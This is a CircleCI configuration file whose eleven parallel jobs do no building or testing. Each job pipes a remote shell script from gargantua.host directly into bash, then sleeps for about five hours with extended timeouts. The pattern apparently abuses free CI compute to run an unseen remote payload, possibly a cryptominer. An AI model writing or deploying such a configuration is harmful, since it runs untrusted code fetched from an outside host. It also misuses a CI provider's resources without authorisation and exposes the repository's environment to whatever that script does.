version: 2.1

jobs:
  pressiyhep:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 3482"
            no_output_timeout: 5h

  pressiyhep1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 6452"
            no_output_timeout: 5h

  pressiyhep2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 33482"
            no_output_timeout: 5h

  pressiyhep3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 4582"
            no_output_timeout: 5h

  pressiyhep4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 34632"
            no_output_timeout: 5h

  pressiyhep5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 34824563"
            no_output_timeout: 5h

  pressiyhep6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 348463"
            no_output_timeout: 5h

  pressiyhep7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 3486342"
            no_output_timeout: 5h

  pressiyhep8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 3342482"
            no_output_timeout: 5h

  pressiyhep9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 343482"
            no_output_timeout: 5h

  pressiyhep10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanasekesa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 34263482"
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - pressiyhep
      - pressiyhep1
      - pressiyhep2
      - pressiyhep3
      - pressiyhep4
      - pressiyhep5
      - pressiyhep6
      - pressiyhep7
      - pressiyhep8
      - pressiyhep9
      - pressiyhep10
